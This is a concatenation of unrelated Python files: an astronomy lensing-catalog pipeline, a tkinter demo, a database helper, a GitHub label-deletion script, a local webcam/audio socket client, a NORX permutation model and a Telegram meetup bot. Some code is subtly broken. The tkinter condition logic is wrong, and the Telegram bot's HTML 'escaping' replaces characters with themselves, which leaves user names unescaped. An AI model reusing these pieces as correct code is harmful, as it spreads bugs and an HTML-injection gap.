data.to_fits(self.output_path("2pt"), clobber=True)
self.write_metadata()
def write_metadata(self):
import yaml
data = {
"neff": self.neff,
"neffc": self.neffc,
"tomobins": self.tomobins,
"sigma_e": self.sigma_e,
"sigma_ec": self.sigma_ec,
"mean_e1":self.mean_e1,
"mean_e2":self.mean_e2,
"area": self.area,
"repository_version:": find_git_hash(),
}
if 'pzbin_col' in self.gold.dtype.names:
data["source_bins"] = "gold_file_bins"
else:
if type(self.binedges) is list:
data.update({ "source_bins" : self.binedges })
else:
data.update({ "source_bins" : self.binedges.tolist() })
if self.params['lensfile'] != 'None':
data.update({ "lens_neff" : self.lens_neff,
"lens_tomobins" : self.lens_tomobins,
"lens_bins" : self.lens_binedges })
print data
filename = self.output_path('metadata')
open(filename, 'w').write(yaml.dump(data))
def load_array(self,d,file):
if self.params['has_sheared'] & (file=='shapefile'):
d['flags_1p'] = 'flags_select_1p'
d['flags_1m'] = 'flags_select_1m'
d['flags_2p'] = 'flags_select_2p'
d['flags_2m'] = 'flags_select_2m'
if self.params['pdf_type']=='pdf':
keys = [key for key in d.keys() if (d[key] is not None)&(key is not 'pzstack')]
else:
keys = [key for key in d.keys() if (d[key] is not None)]
if 'objid' in keys:
dtypes = [('objid','i8')]
else:
raise ValueError('missing object id in '+file)
dtypes += [(key,'f8') for key in keys if (key is not 'objid')]
if self.params['pdf_type']=='pdf':
dtypes += [('pzstack_'+str(i),'f8') for i in range(len(self.params['pdf_z']))]
fits = fio.FITS(self.params[file])[-1]
array = fits.read(columns=[d[key] for key in keys])
array = rename_fields(array,{v: k for k, v in d.iteritems()})
if ('weight' not in array.dtype.names) & (file=='shapefile'):
array = append_fields(array, 'weight', np.ones(len(array)), usemask=False)
if self.params['pdf_type']=='pdf':
for i in range(len(self.params['pdf_z'])):
array['pzstack'+str(i)]=fits.read(columns=d['pzstack']+str(i))
if np.any(np.diff(array['objid']) < 1):
raise ValueError('misordered or duplicate ids in '+file)
return array
def load_data(self):
"""
Load data files.
"""
import time
import importlib
col = importlib.import_module('.'+self.params['dict_file'],'pipeline')
# def lowercase_array(arr):
# old_names = arr.dtype.names
# new_names = [name.lower() for name in old_names]
# renames = dict(zip(old_names, new_names))
# return rename_fields(arr, renames)
t0 = time.time()
self.gold = self.load_array(col.gold_dict, 'goldfile')
print 'Done goldfile',time.time()-t0,self.gold.dtype.names
self.shape = self.load_array(col.shape_dict, 'shapefile')
print 'Done shapefile',time.time()-t0,self.shape.dtype.names
self.pz = self.load_array(col.pz_bin_dict, 'photozfile')
print 'Done pzfile',time.time()-t0,self.pz.dtype.names
if self.params['has_sheared']:
self.pz_1p = self.load_array(col.pz_bin_dict, 'photozfile_1p')
print 'Done pz1pfile',time.time()-t0,self.pz_1p.dtype.names
self.pz_1m = self.load_array(col.pz_bin_dict, 'photozfile_1m')
print 'Done pz1mfile',time.time()-t0,self.pz_1m.dtype.names
self.pz_2p = self.load_array(col.pz_bin_dict, 'photozfile_2p')
print 'Done pz2pfile',time.time()-t0,self.pz_2p.dtype.names
self.pz_2m = self.load_array(col.pz_bin_dict, 'photozfile_2m')
print 'Done pz2mfile',time.time()-t0,self.pz_2m.dtype.names
self.pz_nofz = self.load_array(col.pz_stack_dict, 'photozfile_nz')
print 'Done pznofzfile',time.time()-t0,self.pz_nofz.dtype.names
if self.params['lensfile'] != 'None':
self.lens = self.load_array(col.lens_dict, 'lensfile')
print 'Done lensfile',time.time()-t0,self.lens.dtype.names
self.lens_pz = self.load_array(col.lens_pz_dict, 'lensfile')
print 'Done lens_pzfile',time.time()-t0,self.lens_pz.dtype.names
if 'm1' not in self.shape.dtype.names:
self.shape = append_fields(self.shape, 'm1', self.shape['m2'], usemask=False)
if 'm2' not in self.shape.dtype.names:
self.shape = append_fields(self.shape, 'm2', self.shape['m1'], usemask=False)
if self.params['oneplusm']==False:
print 'converting m to 1+m'
self.shape['m1'] = np.copy(self.shape['m1'])+1.
self.shape['m2'] = np.copy(self.shape['m2'])+1.
if 'c1' in self.shape.dtype.names:
self.shape['e1'] -= self.shape['c1']
self.shape['e2'] -= self.shape['c2']
self.shape['c1'] = None
self.shape['c2'] = None
if self.params['flip_e2']==True:
print 'flipping e2'
self.shape['e2']*=-1
if 'pzbin' not in self.lens_pz.dtype.names:
self.lens_pz = append_fields(self.lens_pz, 'pzbin', self.lens_pz['pzstack'], usemask=False)
if 'pzstack' not in self.lens_pz.dtype.names:
self.lens_pz = append_fields(self.lens_pz, 'pzstack', self.lens_pz['pzbin'], usemask=False)
if not ((len(self.gold)==len(self.shape))
& (len(self.gold)==len(self.pz))
& (len(self.gold)==len(self.pz_nofz))):
raise ValueError('shape, gold, or photoz length mismatch')
if self.params['has_sheared']:
if not ((len(self.gold)==len(self.pz_1p))
& (len(self.gold)==len(self.pz_1m))
& (len(self.gold)==len(self.pz_2p))
& (len(self.gold)==len(self.pz_2m))):
raise ValueError('shape, gold, or photoz length mismatch')
if self.params['lensfile'] != 'None':
if (len(self.lens)!=len(self.lens_pz)):
raise ValueError('lens and lens_pz length mismatch')
if self.params['lensfile'] != 'None':
keys = [key for key in col.ran_dict.keys() if (col.ran_dict[key] is not None)]
fits = fio.FITS(self.params['randomfile'])[-1]
dtypes=[(key,'f8') for key in keys]
self.randoms = np.empty(fits.read_header()['NAXIS2'], dtype = dtypes)
for key in keys:
self.randoms[key]=fits.read(columns=[col.ran_dict[key]])
if self.params['test_run']==True:
idx = np.random.choice(np.arange(len(self.gold)),100000,replace=False)
np.save(self.output_path("gold_idx"), idx)
self.gold = self.gold[idx]
self.shape = self.shape[idx]
self.pz = self.pz[idx]
self.pz_nofz = self.pz_nofz[idx]
if self.params['has_sheared']:
self.pz_1p = self.pz_1p[idx]
self.pz_1m = self.pz_1m[idx]
self.pz_2p = self.pz_2p[idx]
self.pz_2m = self.pz_2m[idx]
if self.params['lensfile'] != 'None':
idx = np.random.choice(np.arange(len(self.lens)),100000,replace=False)
np.save(self.output_path("lens_idx"), idx)
self.lens = self.lens[idx]
self.lens_pz = self.lens_pz[idx]
idx = np.random.choice(np.arange(len(self.randoms)),100000,replace=False)
np.save(self.output_path("ran_idx"), idx)
self.randoms = self.randoms[idx]
if 'pzbin_col' in self.gold.dtype.names:
mask = (self.gold['pzbin_col'] >= 0)
else:
mask = (self.pz['pzbin'] > self.params['zlims'][0]) & (self.pz['pzbin'] <= self.params['zlims'][1])
if self.params['has_sheared']:
mask_1p = (self.pz_1p['pzbin'] > self.params['zlims'][0]) & (self.pz_1p['pzbin'] <= self.params['zlims'][1])
mask_1m = (self.pz_1m['pzbin'] > self.params['zlims'][0]) & (self.pz_1m['pzbin'] <= self.params['zlims'][1])
mask_2p = (self.pz_2p['pzbin'] > self.params['zlims'][0]) & (self.pz_2p['pzbin'] <= self.params['zlims'][1])
mask_2m = (self.pz_2m['pzbin'] > self.params['zlims'][0]) & (self.pz_2m['pzbin'] <= self.params['zlims'][1])
print 'ngal',np.sum(mask),np.sum(mask_1p),np.sum(mask_1m),np.sum(mask_2p),np.sum(mask_2m)
if 'flags' in self.shape.dtype.names:
mask = mask & (self.shape['flags']==0)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.shape['flags_1p']==0)
mask_1m = mask_1m & (self.shape['flags_1m']==0)
mask_2p = mask_2p & (self.shape['flags_2p']==0)
mask_2m = mask_2m & (self.shape['flags_2m']==0)
print 'ngal',np.sum(mask),np.sum(mask_1p),np.sum(mask_1m),np.sum(mask_2p),np.sum(mask_2m)
if 'flags' in self.pz.dtype.names:
mask = mask & (self.pz['flags']==0)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.pz_1p['flags']==0)
mask_1m = mask_1m & (self.pz_1m['flags']==0)
mask_2p = mask_2p & (self.pz_2p['flags']==0)
mask_2m = mask_2m & (self.pz_2m['flags']==0)
print 'hardcoded spt region cut'
mask = mask & (self.shape['dec']<-35)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.shape['dec']<-35)
mask_1m = mask_1m & (self.shape['dec']<-35)
mask_2p = mask_2p & (self.shape['dec']<-35)
mask_2m = mask_2m & (self.shape['dec']<-35)
np.save('radec.npy',np.vstack((self.shape['ra'],self.shape['dec'])).T[mask])
print np.sum(mask)
if 'footprintfile' in self.params.keys():
print 'cutting catalog to footprintfile'
footmask = np.in1d(hp.ang2pix(4096, np.pi/2.-np.radians(self.shape['dec']),np.radians(self.shape['ra']), nest=False),
fio.FITS(self.params['footprintfile'])[-1].read()['HPIX'],assume_unique=False)
mask = mask & footmask
if self.params['has_sheared']:
mask_1p = mask_1p & footmask
mask_1m = mask_1m & footmask
mask_2p = mask_2p & footmask
mask_2m = mask_2m & footmask
print 'ngal final',np.sum(mask),np.sum(mask & mask_1p & mask_1m & mask_2p & mask_2m)
if self.params['has_sheared']:
full_mask = mask | mask_1p | mask_1m | mask_2p | mask_2m
self.pz_1p = self.pz_1p[full_mask]
self.pz_1m = self.pz_1m[full_mask]
self.pz_2p = self.pz_2p[full_mask]
self.pz_2m = self.pz_2m[full_mask]
self.mask = mask[full_mask]
self.mask_1p = mask_1p[full_mask]
self.mask_1m = mask_1m[full_mask]
self.mask_2p = mask_2p[full_mask]
self.mask_2m = mask_2m[full_mask]
else:
full_mask = mask
self.mask = mask[full_mask]
self.gold = self.gold[full_mask]
self.shape = self.shape[full_mask]
self.pz = self.pz[full_mask]
self.pz_nofz = self.pz_nofz[full_mask]
return
def build_nofz_bins(self, zbins, edge, bin_col, stack_col, pdf_type, weight,shape=False):
"""
Build an n(z), non-tomographic [:,0] and tomographic [:,1:].
"""
if shape&(self.params['has_sheared']):
if 'pzbin_col' in self.gold.dtype.names:
xbins = self.gold['pzbin_col']
else:
xbins0=[]
for x in bin_col:
xbins0.append(np.digitize(x, edge, right=True) - 1)
xbins = xbins0[0]
else:
if 'pzbin_col' in self.gold.dtype.names:
xbins0 = self.gold['pzbin_col']
else:
xbins0 = np.digitize(bin_col, edge, right=True) - 1
xbins=xbins0
# Stack n(z)
nofz = np.zeros((zbins, len(self.z)))
# MC Sample of pdf or redmagic (if redmagic, takes random draw from gaussian of width 0.01)
if (pdf_type == 'sample') | (pdf_type == 'rm'):
if pdf_type == 'rm':
stack_col = np.random.normal(stack_col, self.lens_pz['pzerr']*np.ones(len(stack_col)))
for i in range(zbins):
mask = (xbins == i)
if shape:
mask = mask&self.mask
if self.params['has_sheared']:
mask_1p = (xbins0[1] == i)&self.mask_1p
mask_1m = (xbins0[2] == i)&self.mask_1m
mask_2p = (xbins0[3] == i)&self.mask_2p
mask_2m = (xbins0[4] == i)&self.mask_2m
m1 = np.mean(self.shape['m1'][mask&self.mask])
m2 = np.mean(self.shape['m2'][mask&self.mask])
m1 += (np.mean(self.shape['e1'][mask_1p&self.mask_1p]) - np.mean(self.shape['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(self.shape['e2'][mask_2p&self.mask_2p]) - np.mean(self.shape['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
else:
m1 = self.shape['m1']
m2 = self.shape['m2']
weight *= (m1+m2)/2.
nofz[i,:],b = np.histogram(stack_col[mask], bins=np.append(self.binlow, self.binhigh[-1]), weights=weight[mask])
nofz[i,:] /= np.sum(nofz[i,:]) * self.dz
# Stacking pdfs
elif pdf_type == 'pdf':
for i in xrange(zbins):
mask = (xbins == i)
if shape:
mask = mask&self.mask
nofz[i,:] = np.sum((stack_col[mask].T * weight[mask]).T, axis=0)
nofz[i,:] /= np.sum(nofz[i,:]) * self.dz
return xbins0, nofz
def find_bin_edges(self, x, nbins, w=None):
"""
For an array x, returns the boundaries of nbins equal (possibly weighted by w) bins.
From github.com/matroxel/destest.
"""
if w is None:
xs = np.sort(x)
r = np.linspace(0., 1., nbins + 1.) * (len(x) - 1)
return xs[r.astype(int)]
fail = False
ww = np.sum(w) / nbins
i = np.argsort(x)
k = np.linspace(0.,1., nbins + 1.) * (len(x) - 1)
k = k.astype(int)
r = np.zeros((nbins + 1))
ist = 0
for j in xrange(1,nbins):
if k[j] < r[j-1]:
print 'Random weight approx. failed - attempting brute force approach'
fail = True
break
w0 = np.sum(w[i[ist:k[j]]])
if w0 <= ww:
for l in xrange(k[j], len(x)):
w0 += w[i[l]]
if w0 > ww:
r[j] = x[i[l]]
ist = l
break
else:
for l in xrange(k[j], 0, -1):
w0 -= w[i[l]]
if w0 < ww:
r[j] = x[i[l]]
ist = l
break
if fail:
ist = np.zeros((nbins+1))
ist[0]=0
for j in xrange(1, nbins):
wsum = 0.
for k in xrange(ist[j-1].astype(int), len(x)):
wsum += w[i[k]]
if wsum > ww:
r[j] = x[i[k-1]]
ist[j] = k
break
r[0] = x[i[0]]
r[-1] = x[i[-1]]
return r
def get_neff(self, zbin, tomobins, cat):
"""
Calculate neff for catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.neff = []
self.neffc = []
for i in range(self.tomobins):
if self.params['has_sheared']:
mask = (zbin[0] == i)
mask_1p = (zbin[1] == i)
mask_1m = (zbin[2] == i)
mask_2p = (zbin[3] == i)
mask_2m = (zbin[4] == i)
m1 = np.mean(cat['m1'][mask&self.mask])
m2 = np.mean(cat['m2'][mask&self.mask])
m1 += (np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
else:
mask = (zbin == i)
m1 = cat['m1']
m2 = cat['m2']
mask = mask & self.mask
print i,np.sum(mask)
if self.params['has_sheared']:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
var = cat['cov00'][mask] + cat['cov11'][mask]
var[var>2] = 2.
else:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
snvar = 0.24#np.sqrt((cat['e1'][mask][cat['snr'][mask]>100].var()+cat['e2'][mask][cat['snr'][mask]>100].var())/2.)
var = 1./w - snvar**2
var[var < 0.] = 0.
w[w > snvar**-2] = snvar**-2
a = np.sum(w)**2
b = np.sum(w**2)
c = self.area * 60. * 60.
self.neff.append( a/b/c )
self.neffc.append( ((self.sigma_ec[i]**2 * np.sum(w * s)**2) / np.sum(w**2 * (s**2 * self.sigma_ec[i]**2 + var/2.))) / self.area / 60**2 )
return
def get_lens_neff(self, zbin, tomobins, cat):
"""
Calculate neff for catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.lens_neff = []
for i in range(tomobins):
mask = (zbin == i)
a = np.sum(cat['weight'][mask])**2
b = np.sum(cat['weight'][mask]**2)
c = self.area * 60. * 60.
self.lens_neff.append(np.asscalar( a/b/c ))
return
def get_sigma_e(self, zbin, tomobins, cat):
"""
Calculate sigma_e for shape catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.sigma_e = []
self.sigma_ec = []
self.mean_e1 = []
self.mean_e2 = []
for i in range(tomobins):
if self.params['has_sheared']:
mask = (zbin[0] == i)
mask_1p = (zbin[1] == i)
mask_1m = (zbin[2] == i)
mask_2p = (zbin[3] == i)
mask_2m = (zbin[4] == i)
m1 = np.mean(cat['m1'][mask&self.mask])
m2 = np.mean(cat['m2'][mask&self.mask])
print 'rg',m1,m2
m1 += (np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
print 'rs',(np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg']),(np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
print 'sn',i,np.sum(self.mask_1p),np.sum(self.mask_1m),np.sum(self.mask_2p),np.sum(self.mask_2m)
print 'sn',i,np.sum(mask_1p&self.mask_1p),np.sum(mask_1m&self.mask_1m),np.sum(mask_2p&self.mask_2p),np.sum(mask_2m&self.mask_2m)
else:
mask = (zbin == i)
m1 = cat['m1']
m2 = cat['m2']
mask = mask & self.mask
if self.params['has_sheared']:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = np.ones(len(cat[mask]))#cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
var = cat['cov00'][mask] + cat['cov11'][mask]
var[var>2] = 2.
else:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
snvar = 0.24#np.sqrt((cat['e1'][mask][cat['snr'][mask]>100].var()+cat['e2'][mask][cat['snr'][mask]>100].var())/2.)
print i,'snvar',snvar
var = 1./w - snvar**2
var[var < 0.] = 0.
w[w > snvar**-2] = snvar**-2
print 'var',var.min(),var.max()
self.mean_e1.append(np.asscalar(np.average(cat['e1'][mask],weights=cat['weight'][mask])))
self.mean_e2.append(np.asscalar(np.average(cat['e2'][mask],weights=cat['weight'][mask])))
a1 = np.sum(w**2 * (e1-self.mean_e1[i])**2)
a2 = np.sum(w**2 * (e2-self.mean_e2[i])**2)
b = np.sum(w**2)
c = np.sum(w * s)
print len(w),w
d = np.sum(w)
print i,a1,a2,b,c,d
self.sigma_e.append( np.sqrt( (a1/c**2 + a2/c**2) * (d**2/b) / 2. ) )
self.sigma_ec.append( np.sqrt( np.sum(w**2 * (e1**2 + e2**2 - var)) / (2.*np.sum(w**2 * s**2)) ) )
return
def get_area(self):
if hasattr(self,'area'):
return
if self.params['area']=='None':
import healpy as hp
pix=hp.ang2pix(4096, np.pi/2.-np.radians(self.shape['dec']),np.radians(self.shape['ra']), nest=True)
area=hp.nside2pixarea(4096)*(180./np.pi)**2
mask=np.bincount(pix)>0
self.area=np.sum(mask)*area
self.area=float(self.area)
print self.area
else:
self.area = self.params['area']
return
def find_git_hash():
try:
dirname = os.path.dirname(os.path.abspath(__file__))
head = subprocess.check_output("cd {0}; git show-ref HEADS".format(dirname), shell=True)
except subprocess.CalledProcessError:
head = "UNKNOWN"
warnings.warn("Unable to find git repository commit ID in {}".format(dirname))
return head.split()[0]
|
import tkinter as tk
window=tk.Tk()
window.title('my windows')
window.geometry('400x400')
l=tk.Label(window,bg='yellow',width=20,text='empty')
l.pack()
def print_selection():
if (var1.get()==1 & (var2.get()==0)):
l.config(text='I love only Python')
elif (var1.get()==0 & (var2.get()==0)):
l.config(text='I love only C++')
elif (var1.get()==0 & (var2.get()==0)):
l.config(text='I do not love either ')
else:
l.config(text='I love both')
var1=tk.IntVar()
var2=tk.IntVar()
cl=tk.Checkbutton(window,text='Python',variable=var1,onvalue=1,offvalue=0
,command=print_selection)
c2=tk.Checkbutton(window,text='C++',variable=var2,onvalue=1,offvalue=0
,command=print_selection)
cl.pack()
c2.pack()
window.mainloop()
|
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import logging
from glob import Glob
from ormbase import OrmBase
from drivers import genericdevice
from alarm import alarmzone
'''
module implementing turhouse db connection
'''
def dbConnect():
'''
Create an engine
'''
Glob.dbEngine = create_engine(Glob.config.db())
OrmBase.metadata.create_all(Glob.dbEngine, checkfirst=True)
Glob.dbSession = sessionmaker(bind=Glob.dbEngine, expire_on_commit=False)
def get_or_create(session, model, **kwargs):
'''
Creates an object or returns the object if exists
from: http://stackoverflow.com/questions/2546207/does-sqlalchemy-have-an-equivalent-of-djangos-get-or-create
'''
instance = session.query(model).filter_by(**kwargs).first()
if instance:
return instance
else:
instance = model(**kwargs)
session.add(instance)
return instance
|
import requests
import os
import json
import logging
import argparse
from github import Github
owner = os.environ.get("GIT_ORG")
token = os.environ.get("GIT_TOKEN")
with open('github-management/manage-labels/labels.json') as file:
labels = json.load(file)
g = Github(token)
org = g.get_organization('fuchicorp')
repos = org.get_repos()
parser = argparse.ArgumentParser(description='Delete all labels which is maching <labels.json> file')
parser.add_argument('--delete', help='To delete all labels use --delete')
args = parser.parse_args()
if args.delete == 'yes':
for repo in repos:
remote_labels = repo.get_labels()
for remote_label in remote_labels:
if remote_label.name not in [label['name'] for label in labels]:
try:
remote_label.delete()
logging.warning(f"Deleted label {remote_label.name} from {repo.name}")
except:
print(f"Something wrong to delete {remote_label.name}")
logging.warning("All labels are has been deleted !!")
else:
logging.error("Please use --delete yes")
|
import socket
import cv2
import numpy as np
import time
import threading
import pyaudio
import wavio
import wave
class sendDataThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
#发送buffer类型的data,会先编码,发送其长度,再发送该数据
def sendData(self,serversocket, stringData):
#先发送要发送的数据的长度
#ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串
serversocket.send(str.encode(str(len(stringData)).ljust(16)))
#发送数据
serversocket.send(stringData)
class videoClientThread(sendDataThread):
def __init__(self):
super().__init__()
self.encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),15]
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
serverhost = socket.gethostname()
serverport = 9999
self.serversocket.connect((serverhost, serverport))
while True:
ret, frame = cap.read()
#停止0.1S 防止发送过快服务的处理不过来,如果服务端的处理很多,那么应该加大这个值
time.sleep(0.01)
#cv2.imencode将图片格式转换(编码)成流数据,赋值到内存缓存中;主要用于图像数据格式的压缩,方便网络传输
#'.jpg'表示将图片按照jpg格式编码。
result, imgencode = cv2.imencode('.jpg', frame, self.encode_param)
#建立矩阵
videodata = np.array(imgencode)
#将numpy矩阵转换成buffer形式,以便在网络中传输
stringVideoData = videodata.tostring()
##传输长度和内容
self.sendData(self.serversocket, stringVideoData)
if(cv2.waitKey(1)=='q'):
break
print("客户端关机")
serversocket.close()
class voiceClientThread(sendDataThread):
def __init__(self,videoCT):
super().__init__()
self.videoct = videoCT
self.CHUNK = 1024
self.FORMAT = pyaudio.paInt16
self.CHANNELS = 1
self.RATE = 44100
self.p = pyaudio.PyAudio()
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
serverhost = socket.gethostname()
serverport = 10000
self.serversocket.connect((serverhost, serverport))
#定义声音输入流,直接调用stream.read(CHUNK)函数即可获取对应的data
stream = self.p.open(format=self.FORMAT, channels = self.CHANNELS, rate = self.RATE, input = True, frames_per_buffer = self.CHUNK)
while self.videoct.isAlive():
stringVoiceData = stream.read(self.CHUNK)
self.sendData(self.serversocket, stringVoiceData)
if(cv2.waitKey(1)==ord('q')):
break
print("客户端关机")
stream.stop_stream()
stream.close()
self.p.terminate()
self.serversocket.close()
videoCT = videoClientThread()
videoCT.start()
voiceCT = voiceClientThread(videoCT)
voiceCT.start()
|
"""
Implementation of the NORX permutation.
https://norx.io
"""
from cipher_description import CipherDescription
r = []
def apply_h(cipher, x, y, wordsize):
"""
H(x, y) = (x + y) + ((x & y) << 1)
Applies H on the whole word and assigns it to x.
"""
for bit in range(wordsize):
cipher.apply_xor("s{}".format(x + bit), "s{}".format(y + bit), "txor{}".format(bit))
cipher.apply_and("s{}".format(x + bit), "s{}".format(y + bit), "tand{}".format(bit))
cipher.apply_xor("s{}".format(x), "s{}".format(y), "s{}".format(x))
for bit in range(1, wordsize):
cipher.apply_xor("txor{}".format(bit), "tand{}".format(bit - 1), "s{}".format(x + bit))
def apply_g(cipher, a, b, c, d, wordsize):
apply_h(cipher, a, b, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(a + bit),
"s{}".format(d + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(d + (bit - r[0]) % wordsize))
apply_h(cipher, c, d, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(b + bit),
"s{}".format(c + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(b + (bit - r[1]) % wordsize))
apply_h(cipher, a, b, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(a + bit),
"s{}".format(d + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(d + (bit - r[2]) % wordsize))
apply_h(cipher, c, d, wordsize)
for bit in range(wordsize):
cipher.apply_xor("s{}".format(b + bit),
"s{}".format(c + bit),
"t{}".format(bit))
for bit in range(wordsize):
cipher.apply_and("t{}".format(bit),
"t{}".format(bit),
"s{}".format(b + (bit - r[3]) % wordsize))
def generate_norx_version(wordsize, rounds):
global r
norx = CipherDescription(16 * wordsize)
s = [i*wordsize for i in range(16)]
if wordsize == 32:
r = [8, 11, 16, 31]
elif wordsize == 64:
r = [8, 19, 40, 63]
# Column round
apply_g(norx, s[0], s[4], s[8], s[12], wordsize)
apply_g(norx, s[1], s[5], s[9], s[13], wordsize)
apply_g(norx, s[2], s[6], s[10], s[14], wordsize)
apply_g(norx, s[3], s[7], s[11], s[15], wordsize)
# Diagonal round
apply_g(norx, s[0], s[5], s[10], s[15], wordsize)
apply_g(norx, s[1], s[6], s[11], s[12], wordsize)
apply_g(norx, s[2], s[7], s[8], s[13], wordsize)
apply_g(norx, s[3], s[4], s[9], s[14], wordsize)
return norx
norx32 = generate_norx_version(32, 4)
norx64 = generate_norx_version(64, 4)
|
import json
import os
from collections import Counter
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from tkuosc_bot.utils.concurrent_func import async_edit_msg
class Meet:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/meet/')
OPENING = "open"
CLOSED = "close"
NOT_EXIST = None
def __init__(self, chat_id, message_id):
self.chat_id = chat_id
self.msg_id = message_id
self.meet_id = '{}{}'.format(message_id, chat_id)
self._name = None
self._observers_msg = None
@property
def name(self):
if self._name is None:
self._name = self.access_data()['meet_name']
return self._name
@property
def status(self):
if self.is_opening():
return self.__class__.OPENING
elif self.is_closed():
return self.__class__.CLOSED
else:
return self.__class__.NOT_EXIST
@property
def observers_msg(self):
if self._observers_msg is None:
self._observers_msg = self.access_data()['observers_msg']
return self._observers_msg
def open(self, meet_name):
file_name = os.path.join(self.__class__._dir_path,
'open/{}.json'.format(self.meet_id))
with open(file_name, 'w') as meet_data:
data = {
'meet_name': meet_name,
'observers_msg': [],
'order_users': {}
}
json.dump(data, meet_data)
def close(self):
os.rename(os.path.join(self.__class__._dir_path, 'open/{}.json'.format(self.meet_id)),
os.path.join(self.__class__._dir_path, 'close/{}.json'.format(self.meet_id))
)
def is_opening(self):
"""
Check whether if the meet is open.
:return: Boolean
"""
dir_path = os.path.join(self.__class__._dir_path, 'open/')
return '{}.json'.format(self.meet_id) in os.listdir(dir_path)
def is_closed(self):
dir_path = os.path.join(self.__class__._dir_path, 'close/')
return '{}.json'.format(self.meet_id) in os.listdir(dir_path)
def access_data(self):
"""
Return the dictionary of the data of the meet.
If the meet is not exist, then return None.
:return: dictionary | None
"""
if self.status is self.__class__.NOT_EXIST:
return None
file_name = os.path.join(self.__class__._dir_path, '{}/{}.json'.format(self.status, self.meet_id))
with open(file_name, 'r') as data_file:
return json.load(data_file)
def has_user(self, uid):
return str(uid) in self.access_data()['order_users']
def _update_meet(self):
file_name = os.path.join(self.__class__._dir_path, '{}/{}.json'.format(self.status, self.meet_id))
with open(file_name, 'r+') as data_file:
meet_data = json.load(data_file)
yield meet_data
data_file.seek(0)
json.dump(meet_data, data_file)
data_file.truncate()
def update_order(self, order_data):
for meet_data in self._update_meet():
meet_data['order_users'].update(order_data)
def add_observer_msg(self, msg):
observer_msg = [msg.chat_id, msg.message_id]
for meet_data in self._update_meet():
if observer_msg not in meet_data['observers_msg']:
meet_data['observers_msg'].append(observer_msg)
self._observers_msg = meet_data['observers_msg']
def update_user_status(self, uid, status):
assert status in ('check_in', 'paid', 'got_drinks'), "Status is not exist"
for meet_data in self._update_meet():
meet_data['order_users'][uid]['status'][status] = True
def list_participators_with_html(self):
order_users = self.access_data()['order_users']
if order_users:
text = '<b>Participators:</b>\n' + '\n'.join(
'<a href="tg://user?id={uid}">{name}</a> {order} {user_status}'.format(
uid=uid,
name=data['username'] if data['username'] else data['first_name'].replace('&', '&').replace(
'<', '<').replace('>', '>'),
user_status=self.user_status_with_html(data), **data)
for uid, data in order_users.items())
return text
return '<b>Participators:</b>\n' + ' Nobody now...'
def list_items_with_html(self):
items = Counter(user_data['order'] for user_data in self.access_data()['order_users'].values())
text = '\n'.join(f"{item.replace('&', '&').replace('<', '<').replace('>', '>'): <20}"
f" {quantity:<3}" for item, quantity in items.most_common())
return '<code>' + text + f'\n{f"總共有 {sum(items.values())} 筆": ^23}' '</code>'
@staticmethod
def user_status_with_html(data):
status = data['status']
if status['check_in']:
if status['paid']:
if status['got_drinks']:
text = '<code>飲料獲得</code>'
else:
text = f'''<a href="tg://user?id={data['cashier']}">已結帳</a>'''
else:
text = '<code>到達</code>'
else:
text = ''
return text
def notify_observers(self, bot, with_button=False):
text = self.list_participators_with_html()
keyboard = InlineKeyboardMarkup(
[[InlineKeyboardButton('收單', callback_data='收單, {}, {}'.format(self.chat_id, self.msg_id))]]
) if with_button else None
for chat_id, msg_id in self.observers_msg:
async_edit_msg(bot, text, chat_id, msg_id, keyboard=keyboard, parse_mode="HTML")
class Menu:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/menu/')
